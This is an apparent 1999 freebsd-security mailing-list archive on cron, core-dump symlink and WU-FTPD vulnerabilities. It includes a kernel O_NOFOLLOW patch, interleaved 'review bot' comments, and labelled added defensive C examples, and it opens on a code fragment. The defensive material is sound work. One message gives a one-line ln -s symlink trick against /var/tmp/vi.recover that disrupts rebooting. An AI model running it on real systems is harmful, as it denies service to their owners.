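/* Constructed input with 21 tokens, more than the 15 usable slots: an
 * uncounted loop would write the extras past the end of argv[] on the
 * stack; this one stops and reports -1 with argv[] still terminated.
 * Returns -1 when that is what happened, 0 otherwise. */
int demo_overlong_command(void)
{
    char cmd[] = "x a b c d e f g h i j k l m n o p q r s t";
    char *argv[MAX_ARGS];
    int rc = split_command(cmd, argv, MAX_ARGS);

    return (rc == -1 && argv[MAX_ARGS - 1] == NULL) ? -1 : 0;
}

int main(void)
{
    printf("mailer command: argc=%d\n", demo_mailer_command());
    printf("overlong command: rc=%d\n", demo_overlong_command());
    return 0;
}
```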
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 7:54:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id AE77D14C3E; Fri, 27 Aug 1999 07:54:20 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id IAA89647; Fri, 27 Aug 1999 08:54:16 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id IAA73613; Fri, 27 Aug 1999 08:55:42 -0600 (MDT) Message-Id: <199908271455.IAA73613@harmony.village.org> To: Eivind Eklund Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 27 Aug 1999 16:12:07 +0200." <19990827161206.W79110@bitbox.follo.net> References: <19990827161206.W79110@bitbox.follo.net> <19990827142016.U79110@bitbox.follo.net> <199908271358.KAA19431@ns1.sminter.com.ar> Date: Fri, 27 Aug 1999 08:55:42 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990827161206.W79110@bitbox.follo.net> Eivind Eklund writes: : The exploit :) However, looking more carefully, I note we were : discussing a different vulnerability than the one I thought. This one : is in 2.2, too, I think :-( I've recieved reports of that as well. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 8:51: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 7E0071530C for ; Fri, 27 Aug 1999 08:51:05 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Fri, 27 Aug 1999 09:51:04 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma028942; Fri, 27 Aug 99 09:50:43 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id JAA08996; Fri, 27 Aug 1999 09:49:50 -0600 (MDT) Date: Fri, 27 Aug 1999 09:49:50 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: freebsd-security@FreeBSD.ORG Subject: Re: Buffer overflow in vixie cron? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Paul Hart wrote: > Our code already uses snprintf when using the MAILTO value, but the > original Vixie cron used sprintf without length checks in both version > 3.0 and 3.0.1. I'm assuming that's where the hole was. I take that back. On closer inspection, the Red Hat patch fixes an overflow in cron_popen() in the for loop where the command string is broken down into tokens to make an argv[] array. In the original version, Vixie cron does not keep track of how many tokens it has extracted from the command string and it looks like it will happily overwrite past the end of the stack buffer where it keeps the array it's making. Again, cron in FreeBSD appears to have already fixed this hole (yay!) but the hole appears not to have been as obvious as a string overflow. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. 
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Fri Aug 27 10:00:38 1999
Date: Fri, 27 Aug 1999 10:00:30 -0700
From: Ludwig Pummer
To: Eivind Eklund
Cc: Fernando Schapachnik, freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Message-ID: <37C6C42E.78E600F4@bigfoot.com>
References: <199908261758.KAA94925@burka.rdy.com> <199908271214.JAA00774@ns1.sminter.com.ar> <19990827142016.U79110@bitbox.follo.net>

Eivind Eklund wrote:
>
> On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote:
> > Patches for 2.2.8 are too much asking?
>
> Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to
> test it if you have easy access and time).

It was pointed out yesterday that 3 conditions need to be present for
this to be exploitable, and 2.2.8 doesn't have at least one of the
conditions (core dump won't follow symlinks in 2.2.8).

--Ludwig Pummer

From owner-freebsd-security Fri Aug 27 14:48:12 1999
Date: Fri, 27 Aug 1999 15:48:52 -0600
From: Warner Losh
To: "Sean O'Connell"
Cc: FreeBSD security
Subject: Re: Chflags vulnerability in FreeBSD?
Message-Id: <199908272148.PAA76221@harmony.village.org>
In-reply-to: Your message of "Fri, 27 Aug 1999 10:08:07 EDT." <19990827100807.P28256@stat.Duke.EDU>
References: <19990827100807.P28256@stat.Duke.EDU>

In message <19990827100807.P28256@stat.Duke.EDU> "Sean O'Connell" writes:
: I received the following from SANS (www.sans.org) and it intimated
: that there is a vulnerability in FreeBSD that had previously been
: thought to only exist in BSDi:

Been there, fixed that. I'm waiting to get my account on ftp.cdrom.com
to issue the advisory. I'd post a copy of it, but that would cause more
problems than it will solve.

SANS has been notified. They didn't read enough bugtraq before putting
that message out, since a couple of messages subsequently in the thread
set the record straight.

Warner

From owner-freebsd-security Fri Aug 27 14:51:57 1999
Date: Fri, 27 Aug 1999 15:51:27 -0600
From: Warner Losh
To: Eivind Eklund
Cc: "Sean O'Connell", FreeBSD security
Subject: Re: Chflags vulnerability in FreeBSD?
Message-Id: <199908272151.PAA76238@harmony.village.org>
In-reply-to: Your message of "Fri, 27 Aug 1999 16:18:14 +0200." <19990827161814.X79110@bitbox.follo.net>
References: <19990827161814.X79110@bitbox.follo.net> <19990827100807.P28256@stat.Duke.EDU>

In message <19990827161814.X79110@bitbox.follo.net> Eivind Eklund writes:
: SANS has not done any serious attempt to get information - there has,
: for instance, not come any mail from them to
: security-officer@FreeBSD.org.

I notified SANS and they apologized for their oversight.

Warner

From owner-freebsd-security Fri Aug 27 14:52:14 1999
Date: Fri, 27 Aug 1999 15:52:43 -0600
From: Warner Losh
To: Ludwig Pummer
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Message-Id: <199908272152.PAA76258@harmony.village.org>
In-reply-to: Your message of "Fri, 27 Aug 1999 10:00:30 PDT." <37C6C42E.78E600F4@bigfoot.com>
References: <37C6C42E.78E600F4@bigfoot.com> <199908261758.KAA94925@burka.rdy.com> <199908271214.JAA00774@ns1.sminter.com.ar> <19990827142016.U79110@bitbox.follo.net>

In message <37C6C42E.78E600F4@bigfoot.com> Ludwig Pummer writes:
: It was pointed out yesterday that 3 conditions need to be present for
: this to be exploitable, and 2.2.8 doesn't have at least one of the
: conditions (core dump won't follow symlinks in 2.2.8).

Others have pointed out to me that 2.x will, indeed, follow symlinks.
I don't have a system handy that I can test on (all my 2.x systems
have core dumps turned off completely because they are on ultra-tiny
disks).

Warner

From owner-freebsd-security Fri Aug 27 15:04:45 1999
Date: Fri, 27 Aug 1999 15:04:19 -0700 (PDT)
From: dima@best.net (Dima Ruban)
Reply-To: dima@best.net
To: imp@village.org (Warner Losh)
Cc: ludwigp@bigfoot.com (Ludwig Pummer), freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Message-Id: <199908272204.PAA09830@burka.rdy.com>
In-Reply-To: <199908272152.PAA76258@harmony.village.org> from Warner Losh at "Aug 27, 1999 03:52:43 pm"

Warner Losh writes:
> In message <37C6C42E.78E600F4@bigfoot.com> Ludwig Pummer writes:
> : It was pointed out yesterday that 3 conditions need to be present for
> : this to be exploitable, and 2.2.8 doesn't have at least one of the
> : conditions (core dump won't follow symlinks in 2.2.8).
>
> Others have pointed out to me that 2.x will, indeed, follow symlinks.
> I don't have a system handy that I can test on (all my 2.x systems
> have core dumps turned off completely because they are on ultra-tiny
> disks).

That was exactly my problem (coredumps are disabled). Sorry about that.

RELENG_2_2 is indeed vulnerable, and the patch is ready. As soon as I
get a review, I'll commit it.

Patch is attached.
> > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima *** sys/LINK/fcntl.h Wed Dec 18 05:08:08 1996 --- sys/fcntl.h Fri Aug 27 14:39:26 1999 *************** *** 84,89 **** --- 84,90 ---- #define O_EXLOCK 0x0020 /* open with exclusive file lock */ #define O_ASYNC 0x0040 /* signal pgrp when data ready */ #define O_FSYNC 0x0080 /* synchronous writes */ + #define O_NOFOLLOW 0x0100 /* don't follow symlinks */ #endif #define O_CREAT 0x0200 /* create if nonexistent */ #define O_TRUNC 0x0400 /* truncate to zero length */ *** kern/LINK/kern_sig.c Sat Dec 21 10:57:24 1996 --- kern/kern_sig.c Fri Aug 27 14:38:25 1999 *************** *** 1241,1249 **** p->p_rlimit[RLIMIT_CORE].rlim_cur) return (EFAULT); sprintf(name, "%s.core", p->p_comm); ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); if ((error = vn_open(&nd, ! O_CREAT | FWRITE, S_IRUSR | S_IWUSR))) return (error); vp = nd.ni_vp; --- 1241,1249 ---- p->p_rlimit[RLIMIT_CORE].rlim_cur) return (EFAULT); sprintf(name, "%s.core", p->p_comm); ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); if ((error = vn_open(&nd, ! O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR))) return (error); vp = nd.ni_vp; *** kern/LINK/vfs_vnops.c Sat Mar 8 07:16:18 1997 --- kern/vfs_vnops.c Fri Aug 27 14:37:01 1999 *************** *** 87,93 **** if (fmode & O_CREAT) { ndp->ni_cnd.cn_nameiop = CREATE; ndp->ni_cnd.cn_flags = LOCKPARENT | LOCKLEAF; ! if ((fmode & O_EXCL) == 0) ndp->ni_cnd.cn_flags |= FOLLOW; error = namei(ndp); if (error) --- 87,93 ---- if (fmode & O_CREAT) { ndp->ni_cnd.cn_nameiop = CREATE; ndp->ni_cnd.cn_flags = LOCKPARENT | LOCKLEAF; ! if ((fmode & O_EXCL) == 0 && (fmode & O_NOFOLLOW) == 0) ndp->ni_cnd.cn_flags |= FOLLOW; error = namei(ndp); if (error) *************** *** 119,125 **** } } else { ndp->ni_cnd.cn_nameiop = LOOKUP; ! 
ndp->ni_cnd.cn_flags = FOLLOW | LOCKLEAF; error = namei(ndp); if (error) return (error); --- 119,126 ---- } } else { ndp->ni_cnd.cn_nameiop = LOOKUP; ! ndp->ni_cnd.cn_flags = ! ((fmode & O_NOFOLLOW) ? NOFOLLOW : FOLLOW) | LOCKLEAF; error = namei(ndp); if (error) return (error);

From owner-freebsd-security Sat Aug 28 9:17:31 1999
Date: Sat, 28 Aug 1999 12:30:10 -0400
From: Mike Tancsa
To: security@freebsd.org
Cc: ache@freebsd.org
Subject: Fwd: WU-FTPD Security Update
Message-Id: <4.1.19990828122706.04dd8780@granite.sentex.ca>

Just in case this went missed by those not on bugtraq

---Mike

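Review bot: in the sys/fcntl.h hunk the new O_NOFOLLOW sits inside the same conditional block as O_EXLOCK, O_ASYNC and O_FSYNC (the `#endif` right after it closes that block), so it is hidden under the strict POSIX namespace; that is fine for the kernel callers in this patch, but because vn_open() now honours the flag from fmode it becomes a user-visible open(2) flag, and the open(2) manual page should document it together with the error a symbolic link produces under it. Please also confirm 0x0100 is unused elsewhere in this header; in the shown range the neighbours are O_FSYNC 0x0080 and O_CREAT 0x0200, so the bit is free there.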
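Review bot: in the kern/kern_sig.c hunk the NOFOLLOW handed to NDINIT() never reaches namei(): vn_open() (the vfs_vnops.c hunks) assigns ndp->ni_cnd.cn_flags afresh in both its O_CREAT and its LOOKUP branch, so the fix is carried entirely by the O_NOFOLLOW added to the fmode argument. Either drop the NDINIT change or comment that it is intentional redundancy, so the next reader does not conclude the NDINIT flag is what protects the core dump. Two things the hunk does not show and the commit message should state: what vn_open() does when namei() hands back the symbolic link's own vnode (it must fail, not open the link), and that the core file is still created without O_EXCL, so an existing regular file named after p_comm in the current directory is still opened for writing.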
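Review bot: in the `*** 87,93 ****` hunk of kern/vfs_vnops.c the new condition reads more clearly as one mask test, `if ((fmode & (O_EXCL | O_NOFOLLOW)) == 0)`, which also states the intent directly: O_EXCL and O_NOFOLLOW are the two cases in which a CREATE lookup must stop at a symbolic link instead of following it. A one-line comment would help here, because the O_EXCL half predates this patch and its reason (an exclusive create must fail when the name is a link, whatever the link points to) is not obvious from the code alone.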
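Review bot: in the `*** 119,125 ****` hunk the ternary is correct, but with NOFOLLOW in cn_flags a LOOKUP that ends on a symbolic link returns the link's own vnode in ndp->ni_vp, and nothing in this hunk rejects it. Point the reviewer at the later v_type check that turns that case into an error (or add one if it is missing), and name the errno in the commit message, since with this change userland can reach the case through open(2).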
>From: Alex Yu
>Reply-To: WU-FTPD Development Group
>Sender: Bugtraq List
>To: BUGTRAQ@SECURITYFOCUS.COM
>Date: Thu, 26 Aug 1999 13:43:07 -0400
>Subject: WU-FTPD Security Update
>
>                          WU-FTPD Security Update
>
>The WU-FTPD Development Group has been informed there is a vulnerability in
>some versions of wu-ftpd.
>
>This vulnerability may allow local & remote users to gain root privileges.
>
>Exploit information involving this vulnerability has been made publicly
>available.
>
>The WU-FTPD Development Group recommends sites take the steps outlined
>below as soon as possible.
>
>1. Description
>
>   Due to insufficient bounds checking on directory name lengths which can
>   be supplied by users, it is possible to overwrite the static memory
>   space of the wu-ftpd daemon while it is executing under certain
>   configurations. By having the ability to create directories and
>   supplying carefully designed directory names to the wu-ftpd, users may
>   gain privileged access.
>
>2. Impact
>
>   This vulnerability may allow local & remote users to gain root
>   privileges.
>
>3. Workarounds/Solution
>
>   Sites may prevent the exploitation of the vulnerability in wu-ftpd by
>   immediately upgrading and applying available patches.
>
>3.1 Affected versions
>
>   Versions known to be affected are:
>
>      wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15
>      wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17
>      wu-ftpd-2.5.0
>
>      BeroFTPD, all present versions
>
>   Other derivatives of wu-ftpd may be affected. See the workarounds
>   (section 3.3) to determine if a derivative is vulnerable.
>
>   Versions known not to be affected are:
>
>      NcFTPd, all versions.
>      wu-ftpd-2.4.2 (final, from Academ)
>      All Washington University versions.
>
>   (Please note: ALL versions of WU-FTPD prior to
>   wu-ftpd-2.4.2-beta-18-vr10 including all WU versions, and all
>   Academ 2.4.1 and 2.4.2 betas, are vulnerable to a remote user
>   root-leveraging attack. See CERT Advisory CA-99-03 'FTP Buffer
>   Overflows' at
>   http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html
>   and section 3.2)
>
>3.2 Upgrade to latest wu-ftpd and apply patch
>
>   The latest version of wu-ftpd from the WU-FTPD Development Group is
>   2.5.0; sites running earlier versions should upgrade to this version as
>   soon as possible.
>
>   The WU-FTPD Development Group has a patch available which corrects this
>   vulnerability. The patch is available directly from the WU-FTPD
>   Development Group's primary distribution site, and will be propagating
>   to its mirrors shortly.
>
>   Several other patches to version 2.5.0 are also available. The WU-FTPD
>   Development Group recommends all available patches be applied.
>
>   Patches for version 2.5.0 are available at the primary distribution
>   site:
>
>      ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/
>
>   The following patches are available:
>
>      CRITICAL-SECURITY.PATCH
>
>         Alternate name for mapped.path.overrun.patch.
>
>      mapped.path.overrun.patch
>
>         Corrects a problem in the implementation of the MAPPING_CHDIR
>         feature which could be used to gain root privileges. All sites
>         should apply this patch as soon as possible.
>
>      not.in.class.patch
>
>         Corrects a problem where anonymous users not in any class could
>         gain anonymous access to the server under certain conditions.
>         All sites should apply this patch.
>
>      glibc.wtmp.patch
>
>         Corrects a problem with Linux systems where logout from wu-ftpd
>         was not properly recorded in the wtmp file. Sites running
>         wu-ftpd on Linux should apply this patch.
>
>      rfc931.timeout.patch
>
>         Corrects some problems with the RFC931 implementation when the
>         remote site does not respond. Under some conditions, wu-ftpd
>         would hang, failing to properly time out. Sites experiencing
>         unexplained hanging wu-ftpd processes should apply this patch.
>
>      data-limit.patch
>
>         Corrects a documentation error. Released as a patch due to the
>         number of questions the error caused. This patch may be safely
>         omitted on all sites.
>
>      deny.not.nameserved.patch
>
>         Corrects a problem in the implementation of '!nameserved' when
>         attempting to deny access to remote users whose hosts do not
>         have proper DNS. All sites should apply this patch.
>
>   Special note for BeroFTPD:
>
>   BeroFTPD users should be able to apply the mapped.path.overrun.patch to
>   their version of wu-ftpd. (This has been tested by the WU-FTPD
>   Development Group on BeroFTPD 1.3.4; it applied cleanly, with some
>   drift in line numbers.) The other patches are for version 2.5.0 of
>   wu-ftpd only and should not be applied to BeroFTPD.
>
>3.3 Apply work-around patch and recompile existing source.
>
>   The feature causing this problem can be disabled at compile time in all
>   affected versions of the daemon:
>
>   o Locate the following text in config.h:
>
>      /*
>       * MAPPING_CHDIR
>       * Keep track of the path the user has chdir'd into and respond with
>       * that to pwd commands. This is to avoid having the absolue disk
>       * path returned. This helps avoid returning dirs like '.1/fred'
>       * when lots of disks make up the ftp area.
>       */
>
>   o If this text is not present, your version of the daemon is NOT
>     vulnerable.
>
>   o Change the following line from:
>
>      #define MAPPING_CHDIR
>
>     to
>
>      #undef MAPPING_CHDIR
>
>   o Rebuild and install the new ftpd executable.
>
>-- 
>
>Gregory A Lundberg                 WU-FTPD Development Group
>1441 Elmdale Drive                 lundberg@wu-ftpd.org
>Kettering, OH 45409-1615 USA       1-800-809-2195

**********************************************************************
Mike Tancsa, Network Admin          *  mike@sentex.net
Sentex Communications Corp,         *  http://www.sentex.net/mike
Cambridge, Ontario                  *  01.519.651.3400
Canada                              *

From owner-freebsd-security Sat Aug 28 9:45:16 1999
Message-Id: <4.1.19990828125707.04dcbac0@granite.sentex.ca>
Date: Sat, 28 Aug 1999 12:57:34 -0400
To: freebsd-security@FreeBSD.ORG
From: Mike Tancsa
Subject: Fwd: WU-FTPD Security Update

Just in case this went missed by those not on bugtraq

---Mike

**********************************************************************
Mike Tancsa, Network Admin          *  mike@sentex.net
Sentex Communications Corp,         *  http://www.sentex.net/mike
Cambridge, Ontario                  *  01.519.651.3400
Canada                              *

From owner-freebsd-security Sat Aug 28 19:23:50 1999
Date: Sat, 28 Aug 1999 22:22:12 -0400 (EDT)
From: dynamo@ime.net
To: security@freebsd.org, imp@village.org
Subject: Not sure if you got it...

to stop rebooting from working right any user can just do this...

ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file

this is my second try -- if you can gimmie an "ok" so i know you got this i would appreciate it.

--
- dynamo@ime.net, lumpy_
- vi -c'1,%s/^[^#]/#&/' /etc/inetd.conf; kill -HUP `cat /var/run/inetd.pid`
--
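The symlink problem behind the core dump patch and the /var/tmp/vi.recover report above, seen from the userland side, as an added example that is not from the thread: creating a file in a directory other users can write to with O_NOFOLLOW (the flag the patch adds to fcntl.h) and O_EXCL, so a planted link is refused. The temp directory and file names are constructed, and the errno values assume Linux (ELOOP) or FreeBSD (EMLINK).

```c
/* Added example (not from the list thread): create a file in a directory
 * other users can write to, refusing to follow a symbolic link planted
 * there. Names below are constructed for the self-test. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Open `path` for writing without following a symlink in its last
 * component. With `exclusive` set, O_EXCL additionally refuses any
 * pre-existing object, which is what a core dump or an editor recovery
 * file wants. Returns a descriptor, or -1 with errno set. */
int open_nofollow_create(const char *path, int exclusive)
{
    int flags = O_WRONLY | O_CREAT | O_NOFOLLOW;
    if (exclusive)
        flags |= O_EXCL;
    return open(path, flags, S_IRUSR | S_IWUSR);
}

/* True if `err` is the errno the kernel uses to say "that was a symlink
 * and O_NOFOLLOW was set": ELOOP on Linux, EMLINK on FreeBSD (assumption:
 * other systems may use a different value). */
int refused_symlink(int err)
{
    if (err == ELOOP)
        return 1;
#ifdef EMLINK
    if (err == EMLINK)
        return 1;
#endif
    return 0;
}

/* Self-test in a private temporary directory: plant a link named
 * "prog.core" that points at a file we own, then check that the
 * O_NOFOLLOW open refuses it, that a plain name still works, and that
 * a second exclusive create of the same plain name fails with EEXIST.
 * Returns 0 when every step behaves as expected, 1..4 identifying the
 * first step that did not. */
int demo_nofollow(void)
{
    char dir[] = "/tmp/nofollow.XXXXXX";
    char target[256], link[256], plain[256];
    int fd, rc;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/prog.core", dir);
    snprintf(plain, sizeof plain, "%s/other.core", dir);

    rc = 1;   /* set up the target file and the link pointing at it */
    fd = open(target, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR);
    if (fd < 0 || symlink(target, link) != 0)
        goto out;
    close(fd);

    rc = 2;   /* through the link: must fail, and fail because it is a link */
    fd = open_nofollow_create(link, 0);
    if (fd >= 0 || !refused_symlink(errno))
        goto out;

    rc = 3;   /* a plain name in the same directory: must succeed */
    fd = open_nofollow_create(plain, 1);
    if (fd < 0)
        goto out;
    close(fd);

    rc = 4;   /* exclusive create of an existing name: must be EEXIST */
    fd = open_nofollow_create(plain, 1);
    if (fd >= 0 || errno != EEXIST)
        goto out;

    rc = 0;
out:
    if (fd >= 0)
        close(fd);
    unlink(plain);
    unlink(link);
    unlink(target);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = demo_nofollow();
    printf("O_NOFOLLOW self-test: %s (step %d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```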
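The MAPPING_CHDIR bookkeeping from the forwarded WU-FTPD advisory above, reconstructed as an added example rather than wu-ftpd's own code: the tracked path lives in a fixed buffer, and the check the advisory says the affected versions lacked (measuring a user-supplied component before appending it) is the length test in mapped_chdir(). The buffer size, the helper names and the sample paths are constructed.

```c
/* Added example, a reconstruction of the MAPPING_CHDIR idea described in
 * the advisory, not wu-ftpd's code: the daemon keeps the user's current
 * directory in a fixed buffer so PWD can answer from it. Buffer size and
 * the sample paths are constructed. */
#include <stdio.h>
#include <string.h>

#define MAPPED_PATH_MAX 32   /* tiny on purpose; the daemon's buffer was larger */

struct mapped_path {
    char path[MAPPED_PATH_MAX];
};

void mapped_init(struct mapped_path *mp)
{
    strcpy(mp->path, "/");
}

/* "cd ..": drop the last component, never going above "/". */
static void mapped_up(struct mapped_path *mp)
{
    char *slash = strrchr(mp->path, '/');
    if (slash == NULL || slash == mp->path)
        mp->path[1] = '\0';
    else
        *slash = '\0';
}

/* Apply one CWD argument to the tracked path. Handles absolute paths,
 * ".", "..", and repeated slashes. Returns 0 and commits the new path,
 * or -1 and leaves the old path untouched when the result would not fit.
 * That length test is the check the advisory says the affected versions
 * lacked: a user-chosen name was appended into the static buffer without
 * being measured first. */
int mapped_chdir(struct mapped_path *mp, const char *dir)
{
    struct mapped_path work = *mp;
    const char *p = dir;

    if (*p == '/')
        mapped_init(&work);
    while (*p != '\0') {
        while (*p == '/')
            p++;
        if (*p == '\0')
            break;
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);

        if (len == 1 && p[0] == '.') {
            /* stay put */
        } else if (len == 2 && p[0] == '.' && p[1] == '.') {
            mapped_up(&work);
        } else {
            size_t cur = strlen(work.path);
            size_t sep = cur > 1 ? 1 : 0;            /* no extra '/' after "/" */
            if (cur + sep + len + 1 > sizeof work.path)
                return -1;                           /* would overflow: refuse */
            if (sep)
                work.path[cur++] = '/';
            memcpy(work.path + cur, p, len);
            work.path[cur + len] = '\0';
        }
        p += len;
    }
    *mp = work;
    return 0;
}

const char *mapped_pwd(const struct mapped_path *mp)
{
    return mp->path;
}

/* Apply a space-separated list of CWD arguments starting from "/" and
 * copy the final path into `out`. Returns the number of steps accepted,
 * stopping at the first one refused. */
int walk(const char *steps, char *out, size_t outlen)
{
    struct mapped_path mp;
    char buf[256];
    int accepted = 0;

    mapped_init(&mp);
    snprintf(buf, sizeof buf, "%s", steps);
    for (char *tok = strtok(buf, " "); tok != NULL; tok = strtok(NULL, " ")) {
        if (mapped_chdir(&mp, tok) != 0)
            break;
        accepted++;
    }
    snprintf(out, outlen, "%s", mapped_pwd(&mp));
    return accepted;
}

/* Check helper: walk `steps` and return the accepted count, or -1 if the
 * final path is not `expected`. */
int walk_ends_at(const char *steps, const char *expected)
{
    char out[MAPPED_PATH_MAX];
    int n = walk(steps, out, sizeof out);
    return strcmp(out, expected) == 0 ? n : -1;
}

int main(void)
{
    char pwd[MAPPED_PATH_MAX];
    int n = walk("pub incoming/../incoming .. /etc ../pub"
                 " a_component_far_too_long_for_the_buffer", pwd, sizeof pwd);
    printf("%d steps accepted, PWD is %s\n", n, pwd);
    return 0;
}
```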